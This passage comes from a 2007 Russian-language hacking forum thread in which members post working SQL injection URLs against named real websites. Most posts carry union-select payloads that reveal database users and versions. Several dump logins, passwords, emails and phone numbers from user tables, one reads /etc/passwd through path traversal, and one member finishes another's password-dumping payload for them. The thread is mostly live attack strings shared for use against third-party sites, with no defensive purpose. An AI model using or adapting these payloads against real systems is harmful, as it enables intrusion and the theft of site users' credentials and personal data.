ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #381  
Старый 02.02.2007, 23:26
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

http://drive-tv.ru/site/index.php?sys_page=main&sys_link=2&sys_blok=2&news _id=-1637%20union%20select%201,2,3,4%20from%20mysql.use r/*
 
Ответить с цитированием

  #382  
Старый 03.02.2007, 01:37
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://galagraphics.kz/image_produce.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(subscriberId,char(58),subscriber,char(58),code), 0x71),0x71),5,6+from+post_subscribers/*
http://www.tesclub.ru/guide/country.html?id=-3
http://www.2gis.ru/about/news/id=18'
вот ещё парочка
 
Ответить с цитированием

  #383  
Старый 03.02.2007, 15:05
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

http://www.atk-studio.ru/relations/forum/index.php?type=forum&showUser&user_id=6%20union%20 select%201,nick,3,4,password,email,7,8%20from%20us ers/*

http://news.samaratoday.ru/showNews.php?id=-105950%20union%20select%201,2,3,null,5,username,em ail,phone,9,0,11,22,33,44,55%20from%20users/*
 
Ответить с цитированием

  #384  
Старый 03.02.2007, 16:25
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

AutoTeatr.ru
Код:
http://www.autoteatr.ru/catalog.php?id=-111+union+select+1,user(),3,4,version(),database(),7,8,9,10,11,12,13/*
Airis.ru
Код:
http://www.airis.ru/dpage.php?pgname=catalog.php&qt=good&ID=1+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,current_date(),15,16,database(),18/*
Kbor.ru
Код:
http://www.kbor.ru/catalog.php?id=11111111+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,database(),21,22,23,24,25,26,27,28,version(),30,current_date(),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51/*
konkord.dp.ua
Код:
http://konkord.dp.ua/catalog.php?id=1111+union+select+1,user(),version(),4,5,6,7/*
 
Ответить с цитированием

  #385  
Старый 03.02.2007, 16:29
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Цитата:
http://www.webmascon.com/archive/topic.asp?id=11%20or%201=1--
http://www.kazsu.kz/main.aspx?id=471'
вот эти две на mssql, ничего вывести не получилось, кто хочет можете попробывать
тут нету иньекции... вывод ошибки не sql.
 
Ответить с цитированием

  #386  
Старый 03.02.2007, 17:14
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

_http://www.artisticsavants.com/member_art.php?member_id=18+union+select+1,2,3,4,c oncat(email,char(58),password),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35+from+TblMember/*

http://zaz.kiev.ua/get.php?type=page&src=../../../../../etc/passwd

как машину назовут, так она и поедет...про сайт аналогично

Последний раз редактировалось злюка; 03.02.2007 в 18:20..
 
Ответить с цитированием

  #387  
Старый 03.02.2007, 20:06
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,'hmm',6,7,8,9,10,11,12/*
таблицу с юзерами пока что не подобрал =\
 
Ответить с цитированием

  #388  
Старый 03.02.2007, 21:50
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.samtelecom.ru/index.php?showfile=1&fid=22&p=downloads&area=1&cat eg=999+union+select+1,user(),3/*
4ё-то таблицы пока что не подобрал =\ позже мб
 
Ответить с цитированием

  #389  
Старый 03.02.2007, 21:56
Аватар для InferNo23
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213

Репутация: 378
По умолчанию

http://www.ascon.ru/order.php?id=-1+union+select+1,2,user(),database(),version()/*
 
Ответить с цитированием

  #390  
Старый 04.02.2007, 00:19
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от ice1k  
http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,'hmm',6,7,8,9,10,11,12/*
таблицу с юзерами пока что не подобрал =\
2ice1k
Держи http://www.webismedia.ru/web.php?s=-99'+union+select+1,2,3,4,5,6,7,concat(login,0x3a,p assword),9,10,11,12+from+webismedia_users/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ